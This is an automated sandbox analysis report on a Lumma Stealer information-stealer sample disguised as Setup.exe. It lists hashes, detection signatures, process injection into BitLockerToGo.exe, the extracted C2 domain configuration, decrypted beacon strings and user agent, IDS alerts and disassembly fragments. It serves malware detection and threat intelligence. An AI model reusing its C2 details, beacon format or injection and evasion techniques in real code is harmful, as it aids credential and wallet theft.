
Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1532481
MD5: f1113fd6005b558b0a9624edd97dbd58
SHA1: 6a0b156e56f99d81e4567d5b4e0d296957f38746
SHA256: faaf64f9c081fdcf8715679549607bba7f70b594459167cf9f5a9b73664d89ba
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain checking for user administrative privileges
Injects a PE file into a foreign process
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: F1113FD6005B558B0A9624EDD97DBD58)
    • BitLockerToGo.exe (PID: 4564 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • WerFault.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1648 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "condifendteu.sbs", "mathcucom.sbs", "allocatinow.sbs", "enlargkiw.sbs", "ehticsprocw.sbs", "vennurviot.sbs", "proclaimykn.buzz"], "Build id": "tLYMe5--222"}
Source | Rule | Description | Author | Strings
00000000.00000002.1919656324.0000000003CD6000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1919656324.0000000003D6B000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1919656324.0000000003DC2000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Setup.exe.3e18000.2.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
1.2.BitLockerToGo.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0.2.Setup.exe.3dc2000.3.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0.2.Setup.exe.3dc2000.3.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
1.2.BitLockerToGo.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
                    No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T12:00:28.046409+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | TCP
2024-10-13T12:00:29.015426+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 188.114.96.3 | 443 | TCP
2024-10-13T12:00:30.024392+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 104.21.33.249 | 443 | TCP
2024-10-13T12:00:30.979674+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 104.21.77.78 | 443 | TCP
2024-10-13T12:00:31.974411+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 172.67.140.193 | 443 | TCP
2024-10-13T12:00:32.962498+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 172.67.173.224 | 443 | TCP
2024-10-13T12:00:33.944460+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 104.21.79.35 | 443 | TCP
2024-10-13T12:00:36.251128+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 172.67.206.204 | 443 | TCP
2024-10-13T12:00:37.287454+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 172.67.206.204 | 443 | TCP
2024-10-13T12:00:28.046409+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | TCP
2024-10-13T12:00:29.015426+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 188.114.96.3 | 443 | TCP
2024-10-13T12:00:30.024392+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 104.21.33.249 | 443 | TCP
2024-10-13T12:00:30.979674+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 104.21.77.78 | 443 | TCP
2024-10-13T12:00:31.974411+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 172.67.140.193 | 443 | TCP
2024-10-13T12:00:32.962498+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 172.67.173.224 | 443 | TCP
2024-10-13T12:00:33.944460+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 104.21.79.35 | 443 | TCP
2024-10-13T12:00:36.251128+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 172.67.206.204 | 443 | TCP
2024-10-13T12:00:37.287454+0200 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 172.67.206.204 | 443 | TCP
2024-10-13T12:00:33.483066+0200 | 2056559 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49742 | 104.21.79.35 | 443 | TCP
2024-10-13T12:00:34.145782+0200 | 2056557 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49743 | 188.114.97.3 | 443 | TCP
2024-10-13T12:00:32.501560+0200 | 2056561 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49741 | 172.67.173.224 | 443 | TCP
2024-10-13T12:00:29.570044+0200 | 2056567 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49738 | 104.21.33.249 | 443 | TCP
2024-10-13T12:00:28.579610+0200 | 2056571 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49737 | 188.114.96.3 | 443 | TCP
2024-10-13T12:00:30.581850+0200 | 2056565 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49739 | 104.21.77.78 | 443 | TCP
2024-10-13T12:00:31.511896+0200 | 2056563 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49740 | 172.67.140.193 | 443 | TCP
2024-10-13T12:00:29.017335+0200 | 2056568 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58064 | 1.1.1.1 | 53 | UDP
2024-10-13T12:00:32.981280+0200 | 2056558 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 57956 | 1.1.1.1 | 53 | UDP
2024-10-13T12:00:33.952216+0200 | 2056556 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 51189 | 1.1.1.1 | 53 | UDP
2024-10-13T12:00:31.976753+0200 | 2056560 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49709 | 1.1.1.1 | 53 | UDP
2024-10-13T12:00:29.044146+0200 | 2056566 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58164 | 1.1.1.1 | 53 | UDP
2024-10-13T12:00:28.058427+0200 | 2056570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 55215 | 1.1.1.1 | 53 | UDP
2024-10-13T12:00:30.077573+0200 | 2056564 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49501 | 1.1.1.1 | 53 | UDP
2024-10-13T12:00:30.993990+0200 | 2056562 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58845 | 1.1.1.1 | 53 | UDP
2024-10-13T12:00:35.413053+0200 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49744 | 104.102.49.254 | 443 | TCP


                    AV Detection

Source: https://steamcommunity.com/profiles/76561199724331900 | URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ | URL Reputation: Label: malware
Source: 0.2.Setup.exe.3dc2000.3.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "condifendteu.sbs", "mathcucom.sbs", "allocatinow.sbs", "enlargkiw.sbs", "ehticsprocw.sbs", "vennurviot.sbs", "proclaimykn.buzz"], "Build id": "tLYMe5--222"}
Source: vennurviot.sbs | Virustotal: Detection: 16%
Source: sergei-esenin.com | Virustotal: Detection: 17%
Source: mathcucom.sbs | Virustotal: Detection: 19%
Source: https://vennurviot.sbs/api | Virustotal: Detection: 17%
Source: https://sergei-esenin.com/r | Virustotal: Detection: 16%
Source: https://sergei-esenin.com:443/api | Virustotal: Detection: 18%
Source: Setup.exe | Virustotal: Detection: 19%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: drawwyobstacw.sbs
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: condifendteu.sbs
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: ehticsprocw.sbs
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: vennurviot.sbs
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: resinedyw.sbs
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: enlargkiw.sbs
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: allocatinow.sbs
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: mathcucom.sbs
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: proclaimykn.buzz
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tLYMe5--222
Source: Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: BitLockerToGo.pdb source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup.exe, 00000000.00000002.1918803772.00000000038B6000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 1_2_0043C27A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h | 1_2_00442B8A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [eax], bl | 1_2_00410CE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 1_2_00410CE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+edi-000000ACh] | 1_2_00442F74
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [ebp+00h], ax | 1_2_0040FF1D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 1_2_00426040
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, eax | 1_2_00423050
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+10h] | 1_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then lea eax, dword ptr [esi+04h] | 1_2_0042C000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], F3285E74h | 1_2_00441010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 731CDBF3h | 1_2_00441010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 1_2_0042B030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h | 1_2_004400E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov esi, dword ptr [ebp-10h] | 1_2_0042E108
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 53F09CFAh | 1_2_004201B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 07E776F1h | 1_2_004201B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-1Bh] | 1_2_004402C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh | 1_2_004402C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, byte ptr [esi+edx+77EAD70Ah] | 1_2_00430300
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [edi], cl | 1_2_00430300
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-40592EB2h] | 1_2_00430300
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+00000414h] | 1_2_00430300
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebp, word ptr [eax] | 1_2_00446310
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h | 1_2_00427560
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, word ptr [esi+ecx] | 1_2_0043E530
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], 64567875h | 1_2_00440530
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [edi+ebx] | 1_2_004055D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-11h] | 1_2_0042D676
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 1_2_0042D676
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-6Ah] | 1_2_00446600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 1_2_004396E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax-416E7C15h] | 1_2_004256A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], dx | 1_2_004256A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov dword ptr [esi], ecx | 1_2_004116B1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 1_2_0041E760
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 1_2_0041E760
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 1_2_0042F840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edi, dword ptr [esp+04h] | 1_2_00420870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 1_2_0043C800
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000E1h] | 1_2_004288F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx+18h] | 1_2_0042C966
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [edx+ebx] | 1_2_004439A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h | 1_2_0042BA60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then lea esi, dword ptr [edx+ecx] | 1_2_0042BA60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ebp-00010794h] | 1_2_00444A30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then push eax | 1_2_0042DAC2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h | 1_2_0043CAD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [esi+ebp], 00000000h | 1_2_0042FB40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, edx | 1_2_0043FB50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-0001078Ah] | 1_2_00444B60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ebp-00010794h] | 1_2_00444B60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, word ptr [edi+eax*4] | 1_2_0040BB20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [0044DFA8h] | 1_2_0042EB30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-11h] | 1_2_0042EB30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-4Fh] | 1_2_00421BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 1_2_00421BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [esi], ax | 1_2_00421BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h | 1_2_00442C56
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h | 1_2_0043FD10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+edi-1Bh] | 1_2_0043BD30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+esi-30034F32h] | 1_2_0040EDF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then lea eax, dword ptr [esp+10h] | 1_2_00442E5F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h | 1_2_0043FE30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [esi+edi*8], DEF797A3h | 1_2_0043FEC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+ebx*8], 07E776F1h | 1_2_0043FEC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+54EFD247h] | 1_2_0042BE90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edi, ecx | 1_2_00441E9B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov dword ptr [esp], 00000000h | 1_2_0041DEB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [ebp+ecx-18h] | 1_2_00444EB0

                    Networking

Source: Network traffic | Suricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.4:51189 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.4:55215 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.4:58064 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.4:57956 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.4:49709 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.4:58845 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.4:49743 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.4:49738 -> 104.21.33.249:443
Source: Network traffic | Suricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.4:49742 -> 104.21.79.35:443
Source: Network traffic | Suricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.4:49501 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.4:49740 -> 172.67.140.193:443
Source: Network traffic | Suricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.4:49739 -> 104.21.77.78:443
Source: Network traffic | Suricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.4:58164 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.4:49737 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.4:49741 -> 172.67.173.224:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 172.67.173.224:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.173.224:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 104.21.33.249:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 188.114.96.3:443
